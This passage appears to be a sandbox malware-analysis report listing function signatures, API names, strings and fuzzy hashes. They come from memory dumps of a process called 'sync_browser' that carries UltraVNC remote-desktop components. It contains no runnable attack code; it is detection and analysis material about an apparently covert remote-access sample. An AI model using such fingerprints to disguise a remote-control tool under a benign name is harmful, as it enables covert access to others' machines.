                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteIconInfoObject
                                                                                          • String ID: vncencoderCursor.cpp : GetBitmapBits() failed.$vncencoderCursor.cpp : GetIconInfo() failed.$vncencoderCursor.cpp : GetObject() for bitmap failed.$vncencoderCursor.cpp : cursor bitmap handle is NULL.$vncencoderCursor.cpp : cursor handle is NULL.$vncencoderCursor.cpp : incorrect data in cursor bitmap.$vncencoderCursor.cpp : vncDesktop::GetRichCursorData() failed.
                                                                                          • API String ID: 2689914137-3853778978
                                                                                          • Opcode ID: 91b6d7ff33d2ce0a44b6c8591e5014cb7464b3371a937ef77d40afe3fa9690e2
                                                                                          • Instruction ID: 3c9b3aba8d7844d79adb348d278eb9f9de0a4048676043f8d194bea96dbc77b7
                                                                                          • Opcode Fuzzy Hash: 91b6d7ff33d2ce0a44b6c8591e5014cb7464b3371a937ef77d40afe3fa9690e2
                                                                                          • Instruction Fuzzy Hash: 33917273B2868289E720DF65E4403B963A4FBA4788F404935EE4DD7A95DF3CE54ACB04
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Delete$Object$CloseDesktopMessagePostRelease
                                                                                          • String ID: vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hmemdc$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to DeleteObject$vncdesktop.cpp : failed to close desktop$vncdesktopsink.cpp : ShutdownInitWindowthread
                                                                                          • API String ID: 4267955742-668190334
                                                                                          • Opcode ID: 1fcc153e8b0560ce5d91f32efa035b23564a634793fcca770c423c182836b27c
                                                                                          • Instruction ID: aff41e2fe28a47d9fedd687086b5040ca68b3f5f34f1172a5df75e476eb0c05f
                                                                                          • Opcode Fuzzy Hash: 1fcc153e8b0560ce5d91f32efa035b23564a634793fcca770c423c182836b27c
                                                                                          • Instruction Fuzzy Hash: 70716F37A29EC285EB24CFA5E8442F96365FF64788F844436E94D87A58DF3CE159D300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$Token$ErrorInformationLastOpenWindow_errno$AllocAllocateCurrentEqualFindFreeHeapInitializeThread_callnewhmalloc
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 1145045407-2988720461
                                                                                          • Opcode ID: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                                                          • Instruction ID: b5e4113d46c0b25730b52471127b2ee54d365087949fae4297c84a92879f1dbd
                                                                                          • Opcode Fuzzy Hash: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                                                          • Instruction Fuzzy Hash: FA618237A287829AEB10DF31E8442A963A5FF64798F645135FA4D87B98DF3CE548C340
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CreateTime$CloseHandleSize$CompareMappingView
                                                                                          • String ID: c:\video0.dat$c:\video1.dat$videodriver.cpp : Error video.dat
                                                                                          • API String ID: 286203867-3102623397
                                                                                          • Opcode ID: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
                                                                                          • Instruction ID: 7bd04220ae01eade834d59e5bd8662a435aa0cc6e9cfe7e54a18720cb2eec328
                                                                                          • Opcode Fuzzy Hash: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
                                                                                          • Instruction Fuzzy Hash: 5A51A226A2864245FB618F29E504679B395AF94BB4F640335EA3D87BE4DE3CE44EC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandleProcess$OpenWindow$CreateErrorFileFindLastModuleNameThreadTokenUser
                                                                                          • String ID: -settingshelper$Shell_TrayWnd$Winsta0\Default
                                                                                          • API String ID: 421869683-3362258117
                                                                                          • Opcode ID: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                                                          • Instruction ID: 7d78f60b6724bad2ef7fee51ac6054e04e5c7ce2a53cab83cb086bf942456c5c
                                                                                          • Opcode Fuzzy Hash: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                                                          • Instruction Fuzzy Hash: 72516232B28B4195EB148F65E8442A9B7A8FB54750F444236FA9D83BA4DF3CE559C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Select$CreateDelete$BrushClipCompatibleEmptyFileModuleNameRectSolidStretch
                                                                                          • String ID: $!
                                                                                          • API String ID: 844750580-2056089098
                                                                                          • Opcode ID: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
                                                                                          • Instruction ID: 48d0bac2391fb77e6dabbb630c55d171dfa1fc6fb20d5e81412e85d37368d4d6
                                                                                          • Opcode Fuzzy Hash: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
                                                                                          • Instruction Fuzzy Hash: D1413436B1878286EB649B16A81436AB798FFA5B94F044235ED5D87BA4DF3CE448C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseQueryValue$Openlstrlenmalloc
                                                                                          • String ID: @$Enterprise$Personal$ProductSuite$SBS$Small Business$System\CurrentControlSet\Control\ProductOptions$Terminal Server
                                                                                          • API String ID: 1137168859-3840687832
                                                                                          • Opcode ID: afa9083a294eb70c229bfb412a138fda909d98f6d2a8b21cbc9d93ad7b811590
                                                                                          • Instruction ID: 1090c472c58ad0d78030b637cdc1ed421a55ccb722cd489f6ce31b15b734cf74
                                                                                          • Opcode Fuzzy Hash: afa9083a294eb70c229bfb412a138fda909d98f6d2a8b21cbc9d93ad7b811590
                                                                                          • Instruction Fuzzy Hash: 97415F33B2C64381EB108B65E58027AB7A8FFA5BD4F445131F94D86AA9DF2CE159CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _errno$FullNamePath__doserrno_getdrive_invalid_parameter_noinfo
                                                                                          • String ID: .$:.
                                                                                          • API String ID: 2522281643-2811378331
                                                                                          • Opcode ID: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
                                                                                          • Instruction ID: 07ae88902e6ff6590de0af69905fad7d07f84c3160674210a2b6d375de65180a
                                                                                          • Opcode Fuzzy Hash: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
                                                                                          • Instruction Fuzzy Hash: CC316D23A3C28286FB61AFA594003BDA790AF61740F984035FE8DC66C7DE7CE849C751
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$Status$Library$AddressCloseCreateCtrlEventFreeHandleHandlerLoadMetricsProcRegisterSystem
                                                                                          • String ID: RegisterServiceCtrlHandlerExA$advapi32.dll$uvnc_service
                                                                                          • API String ID: 333848887-3586523739
                                                                                          • Opcode ID: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
                                                                                          • Instruction ID: 758b682b6dd26cef6c782e148eaead9b4f4b3e7364e5e092b6eddbedc3dc7c30
                                                                                          • Opcode Fuzzy Hash: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
                                                                                          • Instruction Fuzzy Hash: 3241473BA38B8291F614DF15F954275A3A4EFA9B64F60413AF85ED66A0DF7CA00DC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CombineCreateDeleteObjectRectfree$ErrorFreeHeapLast_errnomalloc
                                                                                          • String ID: vistahook.cpp : REct %i %i %i %i
                                                                                          • API String ID: 1305454473-3781348997
                                                                                          • Opcode ID: bc07d1c1ea207020d1a4e4bbca126e57391e310e88d0d493861ec1b4d6ef4c5b
                                                                                          • Instruction ID: d8e68743722c1121d977e622a83a0abc28f8b28157dd485255edf4d8af926410
                                                                                          • Opcode Fuzzy Hash: bc07d1c1ea207020d1a4e4bbca126e57391e310e88d0d493861ec1b4d6ef4c5b
                                                                                          • Instruction Fuzzy Hash: 1DE16877B286918EE710CF69E4846AC77E5FB58B88F504026EE4E93B58DF78D458CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateWindow$Thread$CombineCursorDeleteDesktopForegroundFromObjectPointRectTime_errno_invalid_parameter_noinfofreetime
                                                                                          • String ID: schook$w8hook
                                                                                          • API String ID: 2828954817-2864610768
                                                                                          • Opcode ID: c6b6f8f58876e0042ee40eb6ce619c57b03673fcff18660bbb457870bf259618
                                                                                          • Instruction ID: e6bce7cb7495098615f8f5f45c32a1a1a5cff99c08229441ba34fad395614c83
                                                                                          • Opcode Fuzzy Hash: c6b6f8f58876e0042ee40eb6ce619c57b03673fcff18660bbb457870bf259618
                                                                                          • Instruction Fuzzy Hash: 5BB16033A28B8286EB648F65E4401EA77A4FF54B84F448036EB9D87751DF7CE48AC701
                                                                                          APIs
                                                                                          Strings
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF67E7D5FF6
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF67E7D5F1B
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF67E7D6160
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF67E7D5FC8
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF67E7D5F61
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF67E7D5FAF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                                          • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                                          • API String ID: 181403729-1081969236
                                                                                          • Opcode ID: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
